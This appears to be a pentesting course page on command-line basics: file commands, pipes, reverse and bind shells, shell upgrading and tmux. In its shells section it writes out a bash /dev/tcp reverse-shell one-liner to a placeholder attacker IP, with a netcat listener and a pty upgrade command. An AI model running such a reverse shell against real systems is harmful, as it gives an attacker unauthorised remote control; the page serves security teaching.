Skip to content

Command Line and Shells

The pentester lives in the terminal. The GUI is comfortable, but the command line is fast, scriptable, automatable and —crucially— it’s all you have when you get a remote shell on a victim. Mastering the terminal isn’t optional: it’s your primary work environment and often the only one available on the other side.

  • Terminal: the window. Shell: the program that interprets your commands.
  • Unix shells: bash (the standard), zsh (Kali/macOS default), sh (minimal, the one usually on a victim).
  • Windows: cmd.exe and PowerShell (see PowerShell for Hacking).
pwd where I am ls -la list (hidden + detail)
cd /path move cat / less view content
find / -name "*.conf" find files
grep -r "key" . find text inside files
cp / mv / rm copy / move / delete
chmod +x / chown permissions (see fund-linux)

The real value is in chaining simple commands into something powerful:

cmd1 | cmd2 # pipe: one's output -> the other's input
cmd > f / cmd >> f # redirect output (overwrite / append)
cmd 2>/dev/null # silence errors
cmd1 && cmd2 # cmd2 only if cmd1 succeeded
history | grep ssh # search your history

When you exploit a victim, you get a shell. Two types:

# reverse shell: the VICTIM connects to YOU (beats NAT/outbound firewall)
# on your machine (listener):
nc -lvnp 4444
# on the victim:
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
# bind shell: YOU connect to a port the victim opens

The reverse shell is the most used because outbound traffic is usually allowed.

A basic shell has no autocomplete, arrows, or Ctrl+C. You “upgrade” it:

python3 -c 'import pty;pty.spawn("/bin/bash")'
# then Ctrl+Z, in your terminal: stty raw -echo; fg ; and in the shell: export TERM=xterm
tmux # persistent sessions that survive disconnections
# panes, windows, and never losing a shell if your SSH drops

Essential so you don’t lose a reverse shell or a long scan if the connection drops.

When you compromise a system, what you get is a command line —often poor, no GUI, none of your tools. Your ability to operate there (navigate, enumerate, transfer files, stabilize the shell, pivot) depends entirely on your CLI fluency. And on the attack side, your whole workflow (recon, scanning, exploitation) is faster and more automatable from the terminal.

  • I navigate and manipulate files fluently (cd/ls/find/grep/cat)
  • I compose commands with pipes and redirection
  • I distinguish reverse from bind shells and when to use each
  • I set up a listener (nc) and catch a reverse shell
  • I TTY-upgrade a poor shell
  • I use tmux/screen for persistent sessions
  • I move equally well in bash, zsh, and sh